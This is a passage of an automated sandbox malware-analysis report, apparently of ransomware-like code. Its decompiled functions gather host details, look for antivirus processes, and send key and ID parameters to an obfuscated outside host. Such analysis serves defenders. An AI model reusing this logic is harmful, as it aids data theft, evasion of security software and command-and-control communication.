0x0f4e5ac7
0x0f4e5aca
0x0f4e5aca
0x0f4e5ad6
0x0f4e5ad8
0x0f4e5ade
0x0f4e5aea
0x0f4e5af0
0x0f4e5af9
0x0f4e5b0d
0x0f4e5b17
0x0f4e5b19
0x0f4e5b23
0x0f4e5b30
0x0f4e5b4a
0x0f4e5b50
0x0f4e5b5a
0x0f4e5b61
0x0f4e5b63
0x0f4e5b79
0x0f4e5b88
0x0f4e5ba6
0x0f4e5bb6
0x0f4e5bbc
0x0f4e5bc3
0x0f4e5bc9
0x0f4e5bd3
0x0f4e5bcf
0x0f4e5bcf
0x0f4e5bcf
0x0f4e5bd9
0x0f4e5bdb
0x0f4e5be1
0x0f4e5be7
0x0f4e5bf1
0x0f4e5bf1
0x0f4e5c0b
0x0f4e5c11
0x0f4e5c18
0x0f4e5c25
0x0f4e5c2b
0x0f4e5c2b
0x0f4e5c36
0x0f4e5c3b
0x0f4e5c4b
0x0f4e5c67
0x0f4e5c69
0x0f4e5c69
0x0f4e5c79
0x0f4e5c79
0x0f4e5c86
0x0f4e5c8c
0x0f4e5c8c
0x0f4e5c8f
0x0f4e5c95
0x0f4e5c9f
0x0f4e5c9f
0x0f4e5c97
0x0f4e5c97
0x0f4e5c9d
0x00000000
0x00000000
0x0f4e5c9d
0x0f4e5ca8
0x0f4e5cae
0x0f4e5cb4
0x0f4e5cb8
0x0f4e5cb8
0x0f4e5cbd
0x0f4e5cc3
0x0f4e5cc6
0x0f4e5cc6
0x0f4e5ccb
0x0f4e5ccc
0x0f4e5cce
0x0f4e5cd2
0x0f4e5cb8
0x0f4e5cd6
0x0f4e5cec
0x0f4e5cf9
0x0f4e5d03
0x0f4e5d0d
0x0f4e5d5c
0x0f4e5d62
0x0f4e5d67
0x0f4e5d67
0x0f4e5d7b
0x0f4e5d89
0x0f4e5d96
0x00000000
0x0f4e5d0f
0x0f4e5d20
0x0f4e5d2e
0x0f4e5d3b
0x0f4e5d48
0x0f4e5d4e
0x0f4e5d5b
0x0f4e5d5b
0x0f4e5d0d

APIs

Part of subcall function 0F4E3BC0: GetProcessHeap.KERNEL32(?,?,0F4E4807,00000000,?,00000000,00000000), ref: 0F4E3C5C

Part of subcall function 0F4E7490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F4E74B7
Part of subcall function 0F4E7490: GetUserNameW.ADVAPI32(00000000,?), ref: 0F4E74C8
Part of subcall function 0F4E7490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F4E74E6
Part of subcall function 0F4E7490: GetComputerNameW.KERNEL32 ref: 0F4E74F0
Part of subcall function 0F4E7490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F4E7510
Part of subcall function 0F4E7490: wsprintfW.USER32 ref: 0F4E7551
Part of subcall function 0F4E7490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F4E756E
Part of subcall function 0F4E7490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F4E7592
Part of subcall function 0F4E7490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F4E4810,?), ref: 0F4E75B6
Part of subcall function 0F4E7490: RegCloseKey.KERNEL32(00000000), ref: 0F4E75D2

Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E72F2
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E72FD
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7313
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E731E
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7334
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E733F
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7355
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(0F4E4B36,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7360
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7376
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7381
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7397
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E73A2
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E73C1
Part of subcall function 0F4E72A0: lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E73CC

VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0F4E58D0
CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0F4E5980
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0F4E5999
lstrlenA.KERNEL32(00000000), ref: 0F4E59A2
lstrlenA.KERNEL32(?), ref: 0F4E59AA
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0F4E59BB
lstrlenA.KERNEL32(?), ref: 0F4E59D5
lstrlenA.KERNEL32(00000000), ref: 0F4E59FE
lstrlenA.KERNEL32(?), ref: 0F4E5A1E

Strings

action=call&, xrefs: 0F4E5A88
&id=, xrefs: 0F4E5AD0
&pub_key=, xrefs: 0F4E5B1D
popkadurak, xrefs: 0F4E5BFE, 0F4E5C1A
&version=2.3.1r, xrefs: 0F4E5B7F
&subid=, xrefs: 0F4E5AE4
&priv_key=, xrefs: 0F4E5B54

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$BinaryCryptNameString$CloseComputerHeapOpenProcessQueryUserValuewsprintf
String ID: &id=$&priv_key=$&pub_key=$&subid=$&version=2.3.1r$action=call&$popkadurak
API String ID: 1618292170-4215222798
Opcode ID: 4e62605fbff00ed3cff448ff8d18ec1e214a565d7cc0174fd33a4784f7870dc2
Instruction ID: fd39650b57133b6895c60b4560a16838a95d8e32218c471b7c64416c2966ba90
Opcode Fuzzy Hash: 4e62605fbff00ed3cff448ff8d18ec1e214a565d7cc0174fd33a4784f7870dc2
Instruction Fuzzy Hash: F0F1DD31208301AFD710DF24DC85BABBBA5FF88725F04091EF985A7292DB74E905CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E8050 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 131
networkfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F4E8050(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				short _v68;
				void* _t38;
				void* _t40;
				WCHAR* _t41;
				long _t54;
				long _t59;
				WCHAR* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t67;

				_t64 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E0F4E7E40(_t64); // executed
				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0); // executed
				_t65 = _t40;
				_v12 = 0;
				_v16 = _t65;
				if(_t65 != 0) {
					_t41 = VirtualAlloc(0, 0x2800, 0x3000, 0x40); // executed
					_t62 = _t41;
					_v20 = _t62;
					wsprintfW(_t62, L"%s", _a8);
					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t63 != 0) {
						_v68 = 0x6f0048;
						_v64 = 0x740073;
						_v60 = 0x20003a;
						_v56 = 0x6f0070;
						_v52 = 0x69006c;
						_v48 = 0x690074;
						_v44 = 0x720061;
						_v40 = 0x6d006f;
						_v36 = 0x6e0061;
						_v32 = 0x2e0061;
						_v28 = 0x690062;
						_v24 = 0x74;
						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t67 = _a20;
								_t59 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
									while(1) {
										_t54 = _a4;
										if(_t54 == 0) {
											goto L13;
										}
										 *((char*)(_t54 + _t67)) = 0;
										_a4 = 0;
										_v12 = 1;
										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t63); // executed
					InternetCloseHandle(_v16);
					VirtualFree(_v20, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t40;
				}
			}

0x0f4e8058
0x0f4e805b
0x0f4e8060
0x0f4e8063
0x0f4e8063
0x0f4e806b
0x0f4e8082
0x0f4e8088
0x0f4e808a
0x0f4e8091
0x0f4e8096
0x0f4e80af
0x0f4e80b8
0x0f4e80c0
0x0f4e80c3
0x0f4e80e7
0x0f4e80eb
0x0f4e80f8
0x0f4e8101
0x0f4e8108
0x0f4e810f
0x0f4e8116
0x0f4e811d
0x0f4e8124
0x0f4e812b
0x0f4e8132
0x0f4e8139
0x0f4e8140
0x0f4e8147
0x0f4e8156
0x0f4e816d
0x0f4e81bc
0x0f4e816f
0x0f4e8175
0x0f4e8178
0x0f4e817d
0x0f4e818c
0x0f4e8190
0x0f4e8190
0x0f4e8195
0x00000000
0x00000000
0x0f4e8197
0x0f4e81a2
0x0f4e81a9
0x0f4e81b8
0x00000000
0x00000000
0x0f4e81ba
0x00000000
0x0f4e81b8
0x0f4e8190
0x0f4e818c
0x0f4e816d
0x0f4e8156
0x0f4e81c2
0x0f4e81c9
0x0f4e81ce
0x0f4e81da
0x0f4e81e9
0x0f4e809e
0x0f4e809e
0x0f4e809e

APIs

InternetCloseHandle.WININET(?), ref: 0F4E8063
InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F4E8082
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0F4E7046,ipv4bot.whatismyipaddress.com,0F4EFF90), ref: 0F4E80AF
wsprintfW.USER32 ref: 0F4E80C3
HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0F4E80E1
HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0F4E814E
HttpSendRequestW.WININET(00000000,00690074,0069006C,00000000,00000074), ref: 0F4E8165
InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0F4E8184
InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0F4E81B0
GetLastError.KERNEL32 ref: 0F4E81BC
InternetCloseHandle.WININET(00000000), ref: 0F4E81C9
InternetCloseHandle.WININET(00000000), ref: 0F4E81CE
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F4E7046), ref: 0F4E81DA

Strings

s, xrefs: 0F4E8101
l, xrefs: 0F4E8116
a, xrefs: 0F4E8124
t, xrefs: 0F4E811D
HTTP/1.1, xrefs: 0F4E80D7
:, xrefs: 0F4E8108
p, xrefs: 0F4E810F
a, xrefs: 0F4E8139
a, xrefs: 0F4E8132
b, xrefs: 0F4E8140
t, xrefs: 0F4E8147
o, xrefs: 0F4E812B
H, xrefs: 0F4E80F8

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
String ID: :$H$HTTP/1.1$a$a$a$b$l$o$p$s$t$t
API String ID: 3906118045-2187218134
Opcode ID: 2d1bc238d5283cb607a78bf2bee44c5a413e60f1d8f533961c67a46048527489
Instruction ID: b12d79facaf9f52a8c3a3ec16f454176e6e600d6d281377967060445411a655b
Opcode Fuzzy Hash: 2d1bc238d5283cb607a78bf2bee44c5a413e60f1d8f533961c67a46048527489
Instruction Fuzzy Hash: C7417131640208AFEF108F55DC48FEEBFB9EF44B66F144119FD04AA281C7B59954CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E4B20 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 182
threadsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _v8;
				void* _v12;
				CHAR* _v16;
				int _v20;
				void* _v24;
				int _v28;
				void* _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v60;
				char _v80;
				void* _t54;
				void* _t55;
				int _t79;
				void* _t81;
				short* _t97;
				void* _t114;

				Sleep(0x3e8); // executed
				_t54 = E0F4E47D0(_t90, _t106); // executed
				if(_t54 == 0) {
					_t55 = CreateThread(0, 0, E0F4E2D30, 0, 0, 0); // executed
					_v8 = _t55;
					if(_v8 != 0) {
						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
							_t90 = _v8;
							TerminateThread(_v8, 0);
						}
						_t106 = _v8;
						CloseHandle(_v8); // executed
					}
					E0F4E48C0(); // executed
					E0F4E42B0(_t90, _t106); // executed
					E0F4E6550( &_v80); // executed
					_v40 = 0;
					_v36 = 0;
					_v28 = 0;
					_v44 = 0;
					E0F4E6500( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
					_v48 = 0;
					_v16 = 0;
					if(E0F4E4B00(_v28) == 0) {
						while(_v48 == 0) {
							_t81 = E0F4E5860(_v28, _v44, _v40, _v36,  &_v16); // executed
							_t114 = _t114 + 0xc;
							if(_t81 != 0) {
								_v48 = 1;
							} else {
								Sleep(0x2710);
							}
						}
						E0F4E64C0( &_v80);
						_v32 = 0;
						_v20 = 0;
						_v52 = 0;
						_v60 = 0;
						__eflags = _v16;
						if(_v16 == 0) {
							L19:
							E0F4E4200();
							InitializeCriticalSection(0xf4f2a48);
							__eflags = _v52;
							if(__eflags == 0) {
								E0F4E3FF0( &_v80);
							} else {
								E0F4E41D0(_v32, _v20, __eflags);
							}
							DeleteCriticalSection(0xf4f2a48);
							__eflags = E0F4E3C70();
							if(__eflags != 0) {
								E0F4E45B0(__eflags);
							}
							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
							__eflags = _v24;
							if(__eflags != 0) {
								GetModuleFileNameW(0, _v24, 0x100);
								E0F4E3DB0(_v24, _v24, __eflags);
								VirtualFree(_v24, 0, 0x8000);
							}
							__eflags =  *0xf4f2a44;
							if( *0xf4f2a44 != 0) {
								_t97 =  *0xf4f2a44; // 0x3f0000
								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
							}
							ExitThread(0);
						}
						_v20 = lstrlenA(_v16);
						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
						__eflags = _t79;
						if(_t79 != 0) {
							_v52 = 1;
							goto L19;
						}
						ExitProcess(0);
					} else {
						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
						_t119 = _v12;
						if(_v12 != 0) {
							GetModuleFileNameW(0, _v12, 0x100);
							E0F4E3DB0(_v12,  &_v44, _t119);
							VirtualFree(_v12, 0, 0x8000);
						}
						ExitProcess(0);
					}
				}
				ExitProcess(0);
			}

0x0f4e4b2b
0x0f4e4b31
0x0f4e4b38
0x0f4e4b51
0x0f4e4b57
0x0f4e4b5e
0x0f4e4b74
0x0f4e4b78
0x0f4e4b7c
0x0f4e4b7c
0x0f4e4b82
0x0f4e4b86
0x0f4e4b86
0x0f4e4b8c
0x0f4e4b91
0x0f4e4b99
0x0f4e4b9e
0x0f4e4ba5
0x0f4e4bac
0x0f4e4bb3
0x0f4e4bcd
0x0f4e4bd2
0x0f4e4bd9
0x0f4e4bea
0x0f4e4c3b
0x0f4e4c53
0x0f4e4c58
0x0f4e4c5d
0x0f4e4c6c
0x0f4e4c5f
0x0f4e4c64
0x0f4e4c64
0x0f4e4c73
0x0f4e4c78
0x0f4e4c7d
0x0f4e4c84
0x0f4e4c8b
0x0f4e4c92
0x0f4e4c99
0x0f4e4c9d
0x0f4e4cef
0x0f4e4cef
0x0f4e4cf9
0x0f4e4cff
0x0f4e4d03
0x0f4e4d15
0x0f4e4d05
0x0f4e4d0b
0x0f4e4d0b
0x0f4e4d1f
0x0f4e4d2a
0x0f4e4d2c
0x0f4e4d2e
0x0f4e4d2e
0x0f4e4d47
0x0f4e4d4a
0x0f4e4d4e
0x0f4e4d5b
0x0f4e4d64
0x0f4e4d74
0x0f4e4d74
0x0f4e4d7a
0x0f4e4d81
0x0f4e4d89
0x0f4e4d97
0x0f4e4d97
0x0f4e4d9f
0x0f4e4d9f
0x0f4e4ca9
0x0f4e4cbf
0x0f4e4cd6
0x0f4e4cdc
0x0f4e4cde
0x0f4e4ce8
0x00000000
0x0f4e4ce8
0x0f4e4ce2
0x0f4e4bec
0x0f4e4c00
0x0f4e4c03
0x0f4e4c07
0x0f4e4c14
0x0f4e4c1d
0x0f4e4c2d
0x0f4e4c2d
0x0f4e4c35
0x0f4e4c35
0x0f4e4bea
0x0f4e4b3c

APIs

Sleep.KERNEL32(000003E8), ref: 0F4E4B2B

Part of subcall function 0F4E47D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E482C
Part of subcall function 0F4E47D0: lstrcpyW.KERNEL32 ref: 0F4E484F
Part of subcall function 0F4E47D0: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E4856
Part of subcall function 0F4E47D0: CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E486E
Part of subcall function 0F4E47D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E487A
Part of subcall function 0F4E47D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E4881
Part of subcall function 0F4E47D0: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F4E489B

ExitProcess.KERNEL32 ref: 0F4E4B3C
CreateThread.KERNEL32 ref: 0F4E4B51
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0F4E4B69
TerminateThread.KERNEL32(00000000,00000000), ref: 0F4E4B7C
CloseHandle.KERNEL32(00000000), ref: 0F4E4B86
VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0F4E4BFA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F4E4C14
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F4E4C2D
ExitProcess.KERNEL32 ref: 0F4E4C35

Strings

open, xrefs: 0F4E4D90

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
String ID: open
API String ID: 1803241880-2758837156
Opcode ID: 67ff5d86cb08843524b9c625f73c5c8bb491816a4a3d997d4eb703c64124a8aa
Instruction ID: 3427372175f7c6db7304aa44d4ee1205fe09ab52d00174edf63d8742bbf0819d
Opcode Fuzzy Hash: 67ff5d86cb08843524b9c625f73c5c8bb491816a4a3d997d4eb703c64124a8aa
Instruction Fuzzy Hash: 33711F74A40308ABEB14DFE0DC49FEEBB75BB44713F104119EA05BA2D2DBB86944CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E7B70 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 150
memorystringprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0F4E7B70(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t47;
				void* _t49;
				int _t50;
				WCHAR* _t56;
				int _t63;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t47 = VirtualAlloc(0, 4, 0x3000, 4); // executed
				_t75 = _t47;
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c; // executed
					_t49 = CreateToolhelp32Snapshot(2, 0); // executed
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						_t50 = Process32FirstW(_t49); // executed
						if(_t50 != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
									_t75 = _v24;
									_t63 = Process32NextW(_v20, _t75); // executed
									if(_t63 != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000); // executed
						FindCloseChangeNotification(_v20); // executed
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000); // executed
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}

0x0f4e7b8d
0x0f4e7b8f
0x0f4e7b9d
0x0f4e7b9f
0x0f4e7ba6
0x0f4e7bad
0x0f4e7bb4
0x0f4e7bbb
0x0f4e7bc2
0x0f4e7bc9
0x0f4e7bd0
0x0f4e7bd7
0x0f4e7bde
0x0f4e7be5
0x0f4e7bec
0x0f4e7bf3
0x0f4e7bfa
0x0f4e7c01
0x0f4e7c03
0x0f4e7c05
0x0f4e7c0a
0x0f4e7c34
0x0f4e7c3a
0x0f4e7c0c
0x0f4e7c10
0x0f4e7c16
0x0f4e7c1c
0x0f4e7c22
0x0f4e7c3f
0x0f4e7c41
0x0f4e7c43
0x0f4e7c46
0x0f4e7c49
0x0f4e7c4c
0x0f4e7c4f
0x0f4e7c57
0x00000000
0x0f4e7c60
0x0f4e7c68
0x0f4e7c70
0x0f4e7c7f
0x0f4e7c83
0x00000000
0x0f4e7c85
0x0f4e7c85
0x0f4e7c85
0x0f4e7ce7
0x0f4e7ce7
0x0f4e7cee
0x0f4e7cf6
0x00000000
0x00000000
0x00000000
0x0f4e7cf6
0x0f4e7c8e
0x0f4e7c8f
0x0f4e7c91
0x0f4e7c98
0x0f4e7cb5
0x0f4e7cbe
0x0f4e7c9a
0x0f4e7c9a
0x0f4e7ca7
0x0f4e7ca7
0x0f4e7cc0
0x0f4e7cde
0x0f4e7ce1
0x0f4e7ce4
0x00000000
0x0f4e7ce4
0x0f4e7d07
0x0f4e7d0b
0x0f4e7d0d
0x0f4e7d13
0x0f4e7d20
0x0f4e7d20
0x0f4e7d13
0x0f4e7d2b
0x0f4e7d2b
0x0f4e7d3b
0x0f4e7d40
0x0f4e7d46
0x0f4e7d4b
0x0f4e7d55
0x0f4e7d55
0x0f4e7d5f
0x0f4e7c24
0x0f4e7c2c
0x00000000
0x0f4e7c2c
0x0f4e7c22

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,747166A0,?,775EC0B0), ref: 0F4E7B8D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F4E7C01
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F4E7C16
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F4E7C2C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0F4E7C4F
lstrcmpiW.KERNEL32(0F4F03AC,-00000024), ref: 0F4E7C75
Process32NextW.KERNEL32(?,?), ref: 0F4E7CEE
GetLastError.KERNEL32 ref: 0F4E7CF8
lstrlenW.KERNEL32(00000000), ref: 0F4E7D16
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F4E7D3B
FindCloseChangeNotification.KERNEL32(?), ref: 0F4E7D40
VirtualFree.KERNELBASE(?,?,00008000), ref: 0F4E7D55

Strings

iqt, xrefs: 0F4E7C75

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Virtual$Free$AllocProcess32$ChangeCloseCreateErrorFindFirstLastNextNotificationSnapshotToolhelp32lstrcmpilstrlen
String ID: iqt
API String ID: 1411803383-2805759263
Opcode ID: 3cd66f2fd896895adf448fe0f22355beab2b0fef869e8eadf19fb7dcae79777a
